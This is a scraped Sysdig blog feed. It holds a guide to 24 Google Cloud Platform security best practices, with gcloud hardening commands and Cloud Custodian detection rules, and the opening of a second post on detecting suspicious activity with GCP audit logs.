Sysdig | You searched for gcp https://sysdig.com/ Fri, 23 Feb 2024 07:18:09 +0000 en-US hourly 1 https://wordpress.org/?v=6.6.1 https://sysdig.com/wp-content/uploads/favicon-150x150.png Sysdig | You searched for gcp https://sysdig.com/ 32 32 24 Google Cloud Platform (GCP) security best practices https://sysdig.com/blog/gcp-security-best-practices/ Tue, 27 Sep 2022 12:45:31 +0000 https://sysdig.com/?p=41911 […] to solve and turned to Google Cloud Platform and follow GCP security best practices to build and host your solution. […]

The post 24 Google Cloud Platform (GCP) security best practices appeared first on Sysdig.

]]>
You’ve got a problem to solve and turned to Google Cloud Platform and follow GCP security best practices to build and host your solution. You create your account and are all set to brew some coffee and sit down at your workstation to architect, code, build, and deploy. Except… you aren’t.

  • IAM
    • (1) Check IAM policies
    • (2) MFA enabled for all users
    • (3) Security Key for admin
    • (4) Prevent the use of service accounts
  • KMS
    • (5) Not publicly accessible
    • (6) Rotate KMS encryption keys
  • Cloud Storage
    • (7) Not publicly accessible
    • (8) Uniform bucket-level access enabled
  • VPC
    • (9) Enable VPC Flow Logs
  • Computer Engine
    • (10) Enable Block Project-wide SSH keys
    • (11) Not Enable connecting to serial ports
    • (12) Encrypted with CSEK for critical VMs
  • GKE
    • (13) Enable secrets encryption
    • (14) Enable GKE cluster node encryption
    • (15) Restrict network access
  • Cloud Logging
    • (16) Ensure that Cloud Audit Logging is configured
    • (17) Ensure that sinks are configured
    • (18) Retention policies on log buckets are configured
    • (19) Enable logs router encryption
  • Cloud SQL
    • (20) Enable SSL to all incoming connections
    • (21) Not publicly accessible
    • (22) Do not have public IPs
    • (23) Automated backups configured
  • BigQuery
    • (24) Not publicly accessible

There are many knobs you must tweak and practices to put into action if you want your solution to be operative, secure, reliable, performant, and cost effective. First things first, the best time to do that is now – right from the beginning, before you start to design and engineer.

Google Cloud logo surrounded by Google cloud services. All are protected against threats.

Google Cloud Platform shared responsibility model

The scope of Google Cloud products and services ranges from conventional Infrastructure as a Service (IaaS) to Platform as a Service (PaaS) and Software as a Service (SaaS). As shown in the figure, the traditional boundaries of responsibility between users and cloud providers change based on the service they choose.

At the very least, as part of their common responsibility for security, public cloud providers need to be able to provide you with a solid and secure foundation. Also, providers need to empower you to understand and implement your own parts of the shared responsibility model.

Shared responsibility model

Setup Google Cloud Platform security best practices

First, a word of caution: Never use a non-corporate account.

Instead, use a fully managed corporate Google account to improve visibility, auditing, and control of access to Cloud Platform resources. Don’t use email accounts outside of your organization, such as personal accounts, for business purposes.

Cloud Identity is a stand-alone Identity-as-a-Service (IDaaS) that gives Google Cloud users access to many of the identity management features that Google Workspace provides. It is a suite of secure cloud-native collaboration and productivity applications from Google. Through the Cloud Identity management layer, you can enable or disable access to various Google solutions for members of your organization, including Google Cloud Platform (GCP).

Signing up for Cloud Identity also creates an organizational node for your domain. This helps you map your corporate structure and controls to Google Cloud resources through the Google Cloud resource hierarchy.

Now, activating Multi-Factor Authentication (MFA) is the most important thing you want to do. Do this for every user account you create in your system if you want to have a security-first mindset, especially crucial for administrators. MFA, along with strong passwords, are the most effective way to secure user’s accounts against improper access.

Now that you are set, let’s dig into the GCP security best practices.

GCP Security Walkthrough

In this section, we will walk through the most common GCP services and provide two dozen (we like dozens here) best practices to adopt for each.

Achieving Google Cloud Platform security best practices with Open Source Cloud Custodian is a Cloud Security Posture Management (CSPM) tool. CSPM tools evaluate your cloud configuration and identify common configuration mistakes. They also monitor cloud logs to detect threats and configuration changes.

Now let’s walk through service by service.

Identity and Access Management (IAM)

GCP Identity and Access Management (IAM) helps enforce least privilege access control to your cloud resources. You can use IAM to restrict who is authenticated (signed in) and authorized (has permissions) to use resources.

A few GCP security best practices you want to implement for IAM:

1. Check your IAM policies for personal email accounts 🟨

For each Google Cloud Platform project, list the accounts that have been granted access to that project:

gcloud projects get-iam-policy PROJECT_ID

Also list the accounts added on each folder:

gcloud resource-manager folders get-iam-policy FOLDER_ID

And list your organization’s IAM policy:

gcloud organizations get-iam-policy ORGANIZATION_ID

No email accounts outside the organization domain should be granted permissions in the IAM policies. This excludes Google owned service accounts.

By default, no email addresses outside the organization’s domain have access to its Google Cloud deployments, but any user email account can be added to the IAM policy for Google Cloud Platform projects, folders, or organizations. To prevent this, enable Domain Restricted Sharing within the organization policy:

gcloud resource-manager org-policies allow --organization=ORGANIZATION_ID iam.allowedPolicyMemberDomains=DOMAIN_ID

Here is a Cloud Custodian rule for detecting the use of personal accounts:

- name: personal-emails-used
  description: |
    Use corporate login credentials instead of personal accounts,
    such as Gmail accounts.
  resource: gcp.project
  filters:
    - type: iam-policy
      key: "bindings[*].members[]"
      op: contains-regex
      value: .+@(?!organization\.com|.+gserviceaccount\.com)(.+\.com)*

2. Ensure that MFA is enabled for all user accounts 🟥

Multi-factor authentication requires more than one mechanism to authenticate a user. This secures user logins from attackers exploiting stolen or weak credentials. By default, multi-factor authentication is not set.

Make sure that for each Google Cloud Platform project, folder, or organization, multi-factor authentication for each account is set and, if not, set it up.

3. Ensure Security Key enforcement for admin accounts 🟥

GCP users with Organization Administrator roles have the highest level of privilege in the organization.

These accounts should be protected with the strongest form of two-factor authentication: Security Key Enforcement. Ensure that admins use Security Keys to log in instead of weaker second factors, like SMS or one-time passwords (OTP). Security Keys are actual physical keys used to access Google Organization Administrator Accounts. They send an encrypted signature rather than a code, ensuring that logins cannot be phished.

Identify users with Organization Administrator privileges:

gcloud organizations get-iam-policy ORGANIZATION_ID

Look for members granted the role ”roles/resourcemanager.organizationAdmin” and then manually verify that Security Key Enforcement has been enabled for each account. If not enabled, take it seriously and enable it immediately. By default, Security Key Enforcement is not enabled for Organization Administrators.

If an organization administrator loses access to their security key, the user may not be able to access their account. For this reason, it is important to configure backup security keys.

4. Prevent the use of user-managed service account keys 🟨

Anyone with access to the keys can access resources through the service account. GCP-managed keys are used by Cloud Platform services, such as App Engine and Compute Engine. These keys cannot be downloaded. Google holds the key and rotates it automatically almost every week.

On the other hand, user-managed keys are created, downloaded, and managed by the user and only expire 10 years after they are created.

User-managed keys can easily be compromised by common development practices, such as exposing them in source code, leaving them in the downloads directory, or accidentally showing them on support blogs or channels.

List all the service accounts:

gcloud iam service-accounts list

Identify user-managed service accounts, as such account emails end with

iam.gserviceaccount.com.

For each user-managed service account, list the keys managed by the user:

gcloud iam service-accounts keys list --iam-account=SERVICE_ACCOUNT --managed-by=user

No keys should be listed. If any key shows up in the list, you should delete it:

gcloud iam service-accounts keys delete --iam-account=SERVICE_ACCOUNT KEY_ID

Please be aware that deleting user-managed service account keys may break communication with the applications using the corresponding keys.

As a prevention, you will want to disable service account key creation too.

Other GCP security IAM best practices include:

  • Service accounts should not have Admin privileges.
  • IAM users should not be assigned the Service Account User or Service Account Token Creator roles at project level.
  • User-managed / external keys for service accounts (if allowed, see #4) should be rotated every 90 days or less.
  • Separation of duties should be enforced while assigning service account related roles to users.
  • Separation of duties should be enforced while assigning KMS related roles to users.
  • API keys should not be created for a project.
  • API keys should be restricted to use by only specified Hosts and Apps.
  • API keys should be restricted to only APIs that the application needs access to.
  • API keys should be rotated every 90 days or less.

Key Management Service (KMS)

GCP Cloud Key Management Service (KMS) is a cloud-hosted key management service that allows you to manage symmetric and asymmetric encryption keys for your cloud services in the same way as onprem. It lets you create, use, rotate, and destroy AES 256, RSA 2048, RSA 3072, RSA 4096, EC P256, and EC P384 encryption keys.

Some Google Cloud Platform security best practices you absolutely want to implement for KMS:

5. Check for anonymously or publicly accessible Cloud KMS keys 🟥

Anyone can access the dataset by granting permissions to allUsers or allAuthenticatedUsers. Such access may not be desirable if sensitive data is stored in that location.

In this case, make sure that anonymous and/or public access to a Cloud KMS encryption key is not allowed. By default, Cloud KMS does not allow access to allUsers or allAuthenticatedUsers.

List all Cloud KMS keys:

gcloud kms keys list --keyring=KEY_RING_NAME --location=global --format=json | jq '.[].name'

Remove IAM policy binding for a KMS key to remove access to allUsers and allAuthenticatedUsers:

gcloud kms keys remove-iam-policy-binding KEY_NAME --keyring=KEY_RING_NAME --location=global --member=allUsers --role=ROLE
gcloud kms keys remove-iam-policy-binding KEY_NAME --keyring=KEY_RING_NAME --location=global --member=allAuthenticatedUsers --role=ROLE

The following is a Cloud Custodian rule for detecting the existence of anonymously or publicly accessible Cloud KMS keys:

- name: anonymously-or-publicly-accessible-cloud-kms-keys
  description: |
    It is recommended that the IAM policy on Cloud KMS cryptokeys should
    restrict anonymous and/or public access.
  resource: gcp.kms-cryptokey
  filters:
    - type: iam-policy
      key: "bindings[*].members[]"
      op: intersect
      value: ["allUsers", "allAuthenticatedUsers"]

6. Ensure that KMS encryption keys are rotated within a period of 90 days or less 🟩

Keys can be created with a specified rotation period. This is the time it takes for a new key version to be automatically generated. Since a key is used to protect some corpus of data, a collection of files can be encrypted using the same key, and users with decryption rights for that key can decrypt those files. Therefore, you need to make sure that the rotation period is set to a specific time.

A GCP security best practice is to establish this rotation period to 90 days or less:

gcloud kms keys update new --keyring=KEY_RING --location=LOCATION --rotation-period=90d

By default, KMS encryption keys are rotated every 90 days. If you never modified this, you are good to go.

Cloud Storage

Google Cloud Storage lets you store any amount of data in namespaces called “buckets. These buckets are an appealing target for any attacker who wants to get hold of your data, so you must take great care in securing them.

These are a few of the GCP security best practices to implement:

7. Ensure that Cloud Storage buckets are not anonymously or publicly accessible 🟥

Allowing anonymous or public access gives everyone permission to access bucket content. Such access may not be desirable if you are storing sensitive data. Therefore, make sure that anonymous or public access to the bucket is not allowed.

List all buckets in a project:

gsutil ls

Check the IAM Policy for each bucket returned from the above command:

gsutil iam get gs://BUCKET_NAME

No role should contain allUsers or allAuthenticatedUsers as a member. If that’s not the case, you’ll want to remove them with:

gsutil iam ch -d allUsers gs://BUCKET_NAME
gsutil iam ch -d allAuthenticatedUsers gs://BUCKET_NAME

Also, you might want to prevent Storage buckets from becoming publicly accessible by setting up the Domain restricted sharing organization policy.

8. Ensure that Cloud Storage buckets have uniform bucket-level access enabled 🟨

Cloud Storage provides two systems for granting users permissions to access buckets and objects. Cloud Identity and Access Management (Cloud IAM) and Access Control Lists (ACL). These systems work in parallel. Only one of the systems needs to grant permissions in order for the user to access the cloud storage resource.

Cloud IAM is used throughout Google Cloud and can grant different permissions at the bucket and project levels. ACLs are used only by Cloud Storage and have limited permission options, but you can grant permissions on a per-object basis (fine-grained).

Enabling uniform bucket-level access features disables ACLs on all Cloud Storage resources (buckets and objects), and allows exclusive access through Cloud IAM.

This feature is also used to consolidate and simplify the method of granting access to cloud storage resources. Enabling uniform bucket-level access guarantees that if a Storage bucket is not publicly accessible, no object in the bucket is publicly accessible either.

List all buckets in a project:

gsutil ls

Verify that uniform bucket-level access is enabled for each bucket returned from the above command:

gsutil uniformbucketlevelaccess get gs://BUCKET_NAME/

If uniform bucket-level access is enabled, the response looks like the following:

Uniform bucket-level access setting for gs://BUCKET_NAME/:
    Enabled: True
    LockedTime: LOCK_DATE

Should it not be enabled for a bucket, you can enable it with:

gsutil uniformbucketlevelaccess set on gs://BUCKET_NAME/

You can also set up an Organization Policy to enforce that any new bucket has uniform bucket-level access enabled.

This is a Cloud Custodian rule to check for buckets without uniform-access enabled:

- name: check-uniform-access-in-buckets
  description: |
    It is recommended that uniform bucket-level access is enabled on
    Cloud Storage buckets.
  resource: gcp.bucket
  filters:
    - not:
      - type: value
        key: "iamConfiguration.uniformBucketLevelAccess.enabled"
        value: true

Virtual Private Cloud (VPC)

Virtual Private Cloud provides networking for your cloud-based resources and services that is global, scalable, and flexible. It provides networking functionality to App Engine, Compute Engine or Google Kubernetes Engine (GKE) so you must take great care in securing them.

This is one of the best GCP security practices to implement:

9. Enable VPC Flow Logs for VPC Subnets 🟨

By default, the VPC Flow Logs feature is disabled when a new VPC network subnet is created. When enabled, VPC Flow Logs begin collecting network traffic data to and from your Virtual Private Cloud (VPC) subnets for network usage, network traffic cost optimization, network forensics, and real-time security analysis.

To increase the visibility and security of your Google Cloud VPC network, it’s strongly recommended that you enable Flow Logs for each business-critical or production VPC subnet.

gcloud compute networks subnets update SUBNET_NAME --region=REGION --enable-flow-logs

Compute Engine

Compunte Engine provides security and customizable compute service that lets you create and run virtual machines on Google’s infrastructure.

Several GCP security best practices to implement as soon as possible:

10. Ensure “Block Project-wide SSH keys” is enabled for VM instances 🟨

You can use your project-wide SSH key to log in to all Google Cloud VM instances running within your GCP project. Using SSH keys for the entire project makes it easier to manage SSH keys, but if leaked, they become a security risk that can affect all VM instances in the project. So, it is highly recommended to use specific SSH keys instead, reducing the attack surface if they ever get compromised.

By default, the Block Project-Wide SSH Keys security feature is not enabled for your Google Compute Engine instances.

To Block Project-Wide SSH keys, set the metadata value to TRUE:

gcloud compute instances add-metadata INSTANCE_NAME --metadata block-project-ssh-keys=true

The following is a Cloud Custodian sample rule to check for instances without this block:

- name: instances-without-project-wide-ssh-keys-block
  description: |
    It is recommended to use Instance specific SSH key(s) instead
    of using common/shared project-wide SSH key(s) to access Instances.
  resource: gcp.instance
  filters:
    - not:
      - type: value
        key: name
        op: regex
        value: '(gke).+'
    - type: metadata
      key: '"block-project-ssh-keys"'
      value: "false"

11. Ensure ‘Enable connecting to serial ports’ is not enabled for VM Instance 🟨

A Google Cloud virtual machine (VM) instance has four virtual serial ports. Interacting with a serial port is similar to using a terminal window in that the inputs and outputs are completely in text mode, and there is no graphical interface or mouse support. The instance’s operating system, BIOS, and other system-level entities can often write output to the serial port and accept input such as commands and responses to prompts.

These system-level entities typically use the first serial port (Port 1), which is often referred to as the interactive serial console.

The interactive serial console does not support IP-based access restrictions, such as IP whitelists. When you enable the interactive serial console on an instance, clients can try to connect to it from any IP address. This allows anyone who knows the correct SSH key, username, project ID, zone, and instance name to connect to that instance. Therefore, to adhere to Google Cloud Platform security best practices, you should disable support for the interactive serial console.

gcloud compute instances add-metadata INSTANCE_NAME --zone=ZONE --metadata serial-port-enable=false

Also, you can prevent VMs from having interactive serial port access enabled by means of Disable VM serial port access organization policy.

12. Ensure VM disks for critical VMs are encrypted with Customer-Supplied Encryption Keys (CSEK) 🟥

By default, the Compute Engine service encrypts all data at rest.

Cloud services manage this type of encryption without any additional action from users or applications. However, if you want full control over instance disk encryption, you can provide your own encryption key.

These custom keys, also known as Customer-Supplied Encryption Keys (CSEKs), are used by Google Compute Engine to protect the Google-generated keys used to encrypt and decrypt instance data. The Compute Engine service does not store CSEK on the server and cannot access protected data unless you specify the required key.

At the very least, business critical VMs should have VM disks encrypted with CSEK.

By default, VM disks are encrypted with Google-managed keys. They are not encrypted with Customer-Supplied Encryption Keys.

Currently, there is no way to update the encryption of an existing disk, so you should create a new disk with Encryption set to Customer supplied. A word of caution is necessary here:

⚠️ If you lose your encryption key, you will not be able to recover the data.

In the gcloud compute tool, encrypt a disk using the --csek-key-file flag during instance creation. If you are using an RSA-wrapped key, use the gcloud beta component:

gcloud beta compute instances create INSTANCE_NAME --csek-key-file=key-file.json

To encrypt a standalone persistent disk use:

gcloud beta compute disks create DISK_NAME --csek-key-file=key-file.json

It is your duty to generate and manage your key. You must provide a key that is a 256-bit string encoded in RFC 4648 standard base64 to the Compute Engine. A sample key-file.json looks like this:

[
  {
    "uri": "https://www.googleapis.com/compute/v1/projects/myproject/zones/us-
central1-a/disks/example-disk",
    "key": "acXTX3rxrKAFTF0tYVLvydU1riRZTvUNC4g5I11NY-c=",
    "key-type": "raw"
  },
  {
    "uri":
"https://www.googleapis.com/compute/v1/projects/myproject/global/snapshots/my
-private-snapshot",
    "key":
"ieCx/NcW06PcT7Ep1X6LUTc/hLvUDYyzSZPPVCVPTVEohpeHASqC8uw5TzyO9U+Fka9JFHz0mBib
XUInrC/jEk014kCK/NPjYgEMOyssZ4ZINPKxlUh2zn1bV+MCaTICrdmuSBTWlUUiFoDD6PYznLwh8
ZNdaheCeZ8ewEXgFQ8V+sDroLaN3Xs3MDTXQEMMoNUXMCZEIpg9Vtp9x2oeQ5lAbtt7bYAAHf5l+g
JWw3sUfs0/Glw5fpdjT8Uggrr+RMZezGrltJEF293rvTIjWOEB3z5OHyHwQkvdrPDFcTqsLfh+8Hr
8g+mf+7zVPEC8nEbqpdl3GPv3A7AwpFp7MA=="
    "key-type": "rsa-encrypted"
  }
]

Other GCP security best practices for Compute Engine include:

  • Ensure that instances are not configured to use the default service account.
  • Ensure that instances are not configured to use the default service account with full access to all Cloud APIs.
  • Ensure oslogin is enabled for a Project.
  • Ensure that IP forwarding is not enabled on Instances.
  • Ensure Compute instances are launched with Shielded VM enabled.
  • Ensure that Compute instances do not have public IP addresses.
  • Ensure that App Engine applications enforce HTTPS connections.

Google Kubernetes Engine Service (GKE)

The Google Kubernetes Engine (GKE) provides a managed environment for deploying, managing, and scaling containerized applications using the Google infrastructure. A GKE environment consists of multiple machines (specifically, Compute Engine instances) grouped together to form a cluster. Continue with GCP security best practices at GKE.

13. Enable application-layer secrets encryption for GKE clusters 🟥

Application-layer secret encryption provides an additional layer of security for sensitive data, such as Kubernetes secrets stored on etcd. This feature allows you to use Cloud KMS managed encryption keys to encrypt data at the application layer and protect it from attackers accessing offline copies of etcd. Enabling application-layer secret encryption in a GKE cluster is considered a security best practice for applications that store sensitive data.

Create a key ring to store the CMK:

gcloud kms keyrings create KEY_RING_NAME --location=REGION --project=PROJECT_NAME --format="table(name)"

Now, create a new Cloud KMS Customer-Managed Key (CMK) within the KMS key ring created at the previous step:

gcloud kms keys create KEY_NAME --location=REGION --keyring=KEY_RING_NAME --purpose=encryption --protection-level=software --rotation-period=90d --format="table(name)"

And lastly, assign the Cloud KMS “CryptoKey Encrypter/Decrypter” role to the appropriate service account:

gcloud projects add-iam-policy-binding PROJECT_ID --member=serviceAccount:service-PROJECT_NUMBER@container-engine-robot.iam.gserviceaccount.com --role=roles/cloudkms.cryptoKeyEncrypterDecrypter

The final step is to enable application-layer secrets encryption for the selected cluster, using the Cloud KMS Customer-Managed Key (CMK) created in the previous steps:

gcloud container clusters update CLUSTER --region=REGION --project=PROJECT_NAME --database-encryption-key=projects/PROJECT_NAME/locations/REGION/keyRings/KEY_RING_NAME/cryptoKeys/KEY_NAME

14. Enable GKE cluster node encryption with customer-managed keys 🟥

To give you more control over the GKE data encryption / decryption process, make sure your Google Kubernetes Engine (GKE) cluster node is encrypted with a customer-managed key (CMK). You can use the Cloud Key Management Service (Cloud KMS) to create and manage your own customer-managed keys (CMKs). Cloud KMS provides secure and efficient cryptographic key management, controlled key rotation, and revocation mechanisms.

At this point, you should already have a key ring where you store the CMKs, as well as customer-managed keys. You will use them here too.

To enable GKE cluster node encryption, you will need to re-create the node pool. For this, use the name of the cluster node pool that you want to re-create as an identifier parameter and custom output filtering to describe the configuration information available for the selected node pool:

gcloud container node-pools describe NODE_POOL --cluster=CLUSTER_NAME --region=REGION --format=json

Now, using the information returned in the previous step, create a new Google Cloud GKE cluster node pool, encrypted with your customer-managed key (CMK):

gcloud beta container node-pools create NODE_POOL --cluster=CLUSTER_NAME --region=REGION --disk-type=pd-standard --disk-size=150 --boot-disk-kms-key=projects/PROJECT/locations/REGION/keyRings/KEY_RING_NAME/cryptoKeys/KEY_NAME

Once your new cluster node pool is working properly, you can delete the original node pool to stop adding invoices to your Google Cloud account.

⚠️ Take good care to delete the old pool and not the new one!

gcloud container node-pools delete NODE_POOL --cluster=CLUSTER_NAME --region=REGION

15. Restrict network access to GKE clusters 🟥

To limit your exposure to the Internet, make sure your Google Kubernetes Engine (GKE) cluster is configured with a master authorized network. Master authorized networks allow you to whitelist specific IP addresses and/or IP address ranges to access cluster master endpoints using HTTPS.

Adding a master authorized network can provide network-level protection and additional security benefits to your GKE cluster. Authorized networks allow access to a particular set of trusted IP addresses, such as those originating from a secure network. This helps protect access to the GKE cluster if the cluster’s authentication or authorization mechanism is vulnerable.

Add authorized networks to the selected GKE cluster to grant access to the cluster master from the trusted IP addresses / IP ranges that you define:

gcloud container clusters update CLUSTER_NAME --zone=REGION --enable-master-authorized-networks --master-authorized-networks=CIDR_1,CIDR_2,...

In the previous command, you can specify multiple CIDRs (up to 50) separated by a comma.

The above are the most important best practices for GKE, since not adhering to them poses a high risk, but there are other security best practices you might want to adhere to:

  • Enable auto-repair for GKE cluster nodes.
  • Enable auto-upgrade for GKE cluster nodes.
  • Enable integrity monitoring for GKE cluster nodes.
  • Enable secure boot for GKE cluster nodes.
  • Use shielded GKE cluster nodes.

Cloud Logging is a fully managed service that allows you to store, search, analyze, monitor, and alert log data and events from Google Cloud and Amazon Web Services. You can collect log data from over 150 popular application components, onprem systems, and hybrid cloud systems.

There are more GCP security best practices focus on Cloud Logging:

16. Ensure that Cloud Audit Logging is configured properly across all services and all users from a project 🟥

Cloud Audit Logging maintains two audit logs for each project, folder, and organization:

Admin Activity and Data Access. Admin Activity logs contain log entries for API calls or other administrative actions that modify the configuration or metadata of resources. These are enabled for all services and cannot be configured. On the other hand, Data Access audit logs record API calls that create, modify, or read user-provided data. These are disabled by default and should be enabled.

It is recommended to have an effective default audit config configured in such a way that you can log user activity tracking, as well as changes (tampering) to user data. Logs should be captured for all users.

For this, you will need to edit the project’s policy. First, download it as a yaml file:

gcloud projects get-iam-policy PROJECT_ID > /tmp/project_policy.yaml

Now, edit /tmp/project_policy.yaml adding or changing only the audit logs configuration to the following:

auditConfigs:
- auditLogConfigs:
  - logType: DATA_WRITE
  - logType: DATA_READ
  service: allServices

Please note that exemptedMembers is not set as audit logging should be enabled for all the users. Last, update the policy with the new changes:

gcloud projects set-iam-policy PROJECT_ID /tmp/project_policy.yaml

⚠️ Enabling the Data Access audit logs might result in your project being charged for the additional logs usage.

#17 Ensure that sinks are configured for all log entries 🟨

You will also want to create a sink that exports a copy of all log entries. This way, you can aggregate logs from multiple projects and export them to a Security Information and Event Management (SIEM).

Exporting involves creating a filter to select the log entries to export and selecting the destination in Cloud Storage, BigQuery, or Cloud Pub/Sub. Filters and destinations are kept in an object called a sink. To ensure that all log entries are exported to the sink, make sure the filter is not configured.

To create a sink to export all log entries into a Google Cloud Storage bucket, run the following command:

gcloud logging sinks create SINK_NAME storage.googleapis.com/BUCKET_NAME

This will export events to a bucket, but you might want to use Cloud Pub/Sub or BigQuery instead.

This is an example of a Cloud Custodian rule to check that the sinks are configured with no filter:

- name: check-no-filters-in-sinks
  description: |
    It is recommended to create a sink that will export copies of
    all the log entries. This can help aggregate logs from multiple
    projects and export them to a Security Information and Event
    Management (SIEM).
  resource: gcp.log-project-sink
  filters:
    - type: value
      key: filter
      value: empty

18. Ensure that retention policies on log buckets are configured using Bucket Lock 🟨

You can enable retention policies on log buckets to prevent logs stored in cloud storage buckets from being overwritten or accidentally deleted. It is recommended that you set up retention policies and configure bucket locks on all storage buckets that are used as log sinks, per the previous best practice.

To list all sinks destined to storage buckets:

gcloud logging sinks list --project=PROJECT_ID

For each storage bucket listed above, set a retention policy and lock it:

gsutil retention set TIME_DURATION gs://BUCKET_NAME
gsutil retention lock gs://BUCKET_NAME

⚠️ Bucket locking is an irreversible action. Once you lock a bucket, you cannot remove the retention policy from it or shorten the retention period.

19. Enable logs router encryption with customer-managed keys 🟥

Make sure your Google Cloud Logs Router data is encrypted with a customer-managed key (CMK) to give you complete control over the data encryption and decryption process, as well as to meet your compliance requirements.

You will want to add a policy, binding to the IAM policy of the CMK, to assign the Cloud KMS “CryptoKey Encrypter/Decrypter” role to the necessary service account. Here, you’ll use the keyring and the CMK already created in #13.

gcloud kms keys add-iam-policy-binding KEY_ID --keyring=KEY_RING_NAME --location=global --member=serviceAccount:PROJECT_NUMBER@gcp-sa-logging.iam.gserviceaccount.com --role=roles/cloudkms.cryptoKeyEncrypterDecrypter

Cloud SQL

Cloud SQL is a fully managed relational database service for MySQL, PostgreSQL, and SQL Server. Run the same relational databases you know with their rich extension collections, configuration flags and developer ecosystem, but without the hassle of self management.

GCP security best practices focus on Cloud SQL:

20. Ensure that the Cloud SQL database instance requires all incoming connections to use SSL 🟨

SQL database connection may reveal sensitive data such as credentials, database queries, query output, etc. if tapped (MITM). For security reasons, it’s recommended that you always use SSL encryption when connecting to your PostgreSQL, MySQL generation 1, and MySQL generation 2 instances.

To enforce SSL encryption for an instance, run the command:

gcloud sql instances patch INSTANCE_NAME --require-ssl

Additionally, MySQL generation 1 instances will require to be restarted for this configuration to get in effect.

This Cloud Custodian rule can check for instances without SSL enforcement:

- name: cloud-sql-instances-without-ssl-required
  description: |
    It is recommended to enforce all incoming connections to
    SQL database instance to use SSL.
  resource: gcp.sql-instance
  filters:
    - not:
      - type: value
        key: "settings.ipConfiguration.requireSsl"
        value: true

21. Ensure that Cloud SQL database instances are not open to the world 🟥

Only trusted / known required IPs should be whitelisted to connect in order to minimize the attack surface of the database server instance. The allowed networks must not have an IP / network configured to 0.0.0.0/0 that allows access to the instance from anywhere in the world. Note that allowed networks apply only to instances with public IPs.

gcloud sql instances patch INSTANCE_NAME --authorized-networks=IP_ADDR1,IP_ADDR2...

To prevent new SQL instances from being configured to accept incoming connections from any IP addresses, set up a Restrict Authorized Networks on Cloud SQL instances Organization Policy.

22. Ensure that Cloud SQL database instances do not have public IPs 🟨

To lower the organization’s attack surface, Cloud SQL databases should not have public IPs. Private IPs provide improved network security and lower latency for your application.

For every instance, remove its public IP and assign a private IP instead:

gcloud beta sql instances patch INSTANCE_NAME --network=VPC_NETWORK_NAME --no-assign-ip

To prevent new SQL instances from getting configured with public IP addresses, set up a Restrict Public IP access on Cloud SQL instances Organization policy.

23. Ensure that Cloud SQL database instances are configured with automated backups 🟨

Backups provide a way to restore a Cloud SQL instance to retrieve lost data or recover from problems with that instance. Automatic backups should be set up for all instances that contain data needing to be protected from loss or damage. This recommendation applies to instances of SQL Server, PostgreSql, MySql generation 1, and MySql generation 2.

List all Cloud SQL database instances using the following command:

gcloud sql instances list

Enable Automated backups for every Cloud SQL database instance:

gcloud sql instances patch INSTANCE_NAME --backup-start-time [HH:MM]

The backup-start-time parameter is specified in 24-hour time, in the UTC±00 time zone, and specifies the start of a 4-hour backup window. Backups can start any time during this backup window.

By default, automated backups are not configured for Cloud SQL instances. Data backup is not possible on any Cloud SQL instance unless Automated Backup is configured.

There are other Cloud SQL best practices to take into account that are specific for MySQL, PostgreSQL, or SQL Server, but the aforementioned four are arguably the most important.

BigQuery

BigQuery is a serverless, highly-scalable, and cost-effective cloud data warehouse with an in-memory BI Engine and machine learning built in. As in the other sections, GCP security best practices

24. Ensure that BigQuery datasets are not anonymously or publicly accessible 🟥

You don’t want to allow anonymous or public access in your BigQuery dataset’s IAM policies. Anyone can access the dataset by granting permissions to allUsers or allAuthenticatedUsers. Such access may not be desirable if sensitive data is stored on the dataset. Therefore, make sure that anonymous and/or public access to the dataset is not allowed.

To do this, you will need to edit the data set information. First you need to retrieve said information into your local filesystem:

bq show --format=prettyjson PROJECT_ID:DATASET_NAME > dataset_info.json

Now, in the access section of dataset_info.json, update the dataset information to remove all roles containing allUsers or allAuthenticatedUsers.

Finally, update the dataset:

bq update --source=dataset_info.json PROJECT_ID:DATASET_NAME

You can prevent BigQuery dataset from becoming publicly accessible by setting up the Domain restricted sharing organization policy.

Compliance Standards & Benchmarks

Setting up all the detection rules and maintaining your GCP environment to keep it secure is an ongoing effort that can take a big chunk of your time – even more so if you don’t have some kind of roadmap to guide you during this continuous work.

You will be better off following the compliance standard(s) relevant to your industry, since they provide all the requirements needed to effectively secure your cloud environment.

Because of the ongoing nature of securing your infrastructure and complying with a security standard, you might also want to recurrently run benchmarks, such as CIS Google Cloud Platform Foundation Benchmark, which will audit your system and report any unconformity it might find.

Conclusion

Jumping to the cloud opens a new world of possibilities, but it also requires learning a new set of Google Cloud Platform security best practices.

Each new cloud service you leverage has its own set of potential dangers you need to be aware of.

Luckily, cloud native security tools like Falco and Cloud Custodian can guide you through these Google Cloud Platform security best practices, and help you meet your compliance requirements.


Secure DevOps on Google Cloud with Sysdig

We’re excited to partner with Google Cloud in helping our joint users more effectively secure their cloud services and containers.

Sysdig Secure cloud security capabilities enable visibility, security, and compliance for Google Cloud container services. This includes image scanning, runtime security, compliance, and forensics for GKE, Anthos, Cloud Run, Cloud Build, Google Container Registry, and Artifact Registry.

Having a single view across cloud, workloads, and containers will help decrease the time it takes to detect and respond to attacks.

Get started with managing cloud security posture free, forever, for one of your Google Cloud accounts. This includes a daily check against CIS benchmarks, cloud threat detection together with Cloud Audit Logs, and inline container image scanning for up to 250 images a month. You can get the free tier from the Google Cloud Marketplace, or click here to learn more and get started.

Securing Google Cloud Platform with Sysdig - watch video

The post 24 Google Cloud Platform (GCP) security best practices appeared first on Sysdig.

]]>
Detect suspicious activity in GCP using audit logs https://sysdig.com/blog/suspicious-activity-gcp-audit-logs/ Tue, 30 Mar 2021 10:50:05 +0000 https://sysdig.com/?p=36332 GCP audit logs are a powerful tool that track everything happening in your cloud infrastructure. By analyzing them, you […]

The post Detect suspicious activity in GCP using audit logs appeared first on Sysdig.

]]>
GCP audit logs are a powerful tool that track everything happening in your cloud infrastructure. By analyzing them, you can detect and react to threats.

Modern cloud applications are not just virtual machines, containers, binaries, and data. When you migrated to the cloud, you accelerated the development of your apps and increased operational efficiency. But you also started using new assets in the cloud that need securing.

The shared responsibility model from cloud providers means that those cloud assets are being made secure by the providers, but part of that responsibility is yours as a cloud customer. Your cloud account is now the main door to all your information services. It is the most important thing to secure, and is the most desirable target for cybersecurity attacks.

Keep reading to discover how GCP audit logs work, and how to process them in an efficient way to implement cloud threat detection.

Cloud threat detection is key for a secure infrastructure

Cloud providers offer audit logs, a continuous stream of events detailing everything that is happening in your cloud account. These logs contain one event for each command executed on your cloud account.

This includes administrative commands that create, modify, or delete assets, but also read commands for asset metadata and data access events.

